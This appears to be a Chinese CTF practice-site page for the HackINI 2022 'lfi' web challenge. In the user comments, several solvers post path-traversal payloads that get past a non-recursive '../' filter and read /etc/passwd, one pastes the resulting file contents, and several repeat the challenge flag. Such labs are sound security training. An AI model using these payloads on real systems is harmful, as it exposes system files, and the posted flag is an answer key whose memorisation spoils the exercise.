lfiWEB 未解决

分数: 0 金币: 0
所属赛事: HackINI 2022
题目作者: 未知
一  血: tzzzez
一血奖励: 0金币
解  决: 2113
提  示:
描  述:
We made some serious checks now, would you test it ?
评论
菜鸡的小韩 2年前

这是一个基本的绕过,因为 str_replace('../', '',$_GET['language'])这串代码../会被替换成空格,所以要进行一个绕过,用..././来代替../ 。url中写?language=./..././..././..././..././..././etc/passwd即可

回复 0

ABC第一深情 2年前

/?language=/etc/passwd

回复 3

曦羽unT0x1ns 2年前

直接用file:///etc/passwd居然也行 oAo

回复 0
13657809271 1年前

我这样怎么不行

回复 0

XHTX 2年前

?language=/languages//..//..//..//....//etc/passwd shellmates{SH0uLD_H4Ve_MadE_th3_checK_recuRS1V3} 就是这个样子

回复 0

868954104 2年前

?language=/languages/....//....//....//....//etc/passwd

回复 0

868954104 2年前

shellmates{SH0uLD_H4Ve_MadE_th3_checK_recuRS1V3}

回复 1

yituoshi 2年前

Half the truth is often a big lie: Look Here !!! root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nol

回复 0

hh0100 2年前

?language=./languages/....//....//....//....//etc/passwd,加这个成功了,谁能讲讲为啥

回复 0
hack111 2年前

双写,../被屏蔽了然后还会存在一个../

回复 0

hh0100 2年前

shellmates{SH0uLD_H4Ve_MadE_th3_checK_recuRS1V3}

回复 0

顾北 2年前

shellmates{SH0uLD_H4Ve_MadE_th3_checK_recuRS1V3}

回复 0

WriteUp

image
a2cai

2 金币

评分(3)

解题动态

lawrencekz 攻破了该题 1小时前
zzzhq 攻破了该题 4小时前
19806488931 攻破了该题 5小时前
叶斯太 攻破了该题 1天前
叶斯力 攻破了该题 1天前
hj 攻破了该题 1天前
yrasl 攻破了该题 1天前
wupai 攻破了该题 1天前
赛尔波力 攻破了该题 1天前
nurjian 攻破了该题 1天前
斯·斯 攻破了该题 1天前
yejnt 攻破了该题 1天前
ZHANGMOXIN 攻破了该题 1天前
甜豆0612 攻破了该题 1天前
gjq 攻破了该题 1天前
碎灵海 攻破了该题 1天前
xxiaoma 攻破了该题 2天前
Untitled.usr 攻破了该题 3天前
suzhuo 攻破了该题 3天前
sweellong 攻破了该题 3天前
问题反馈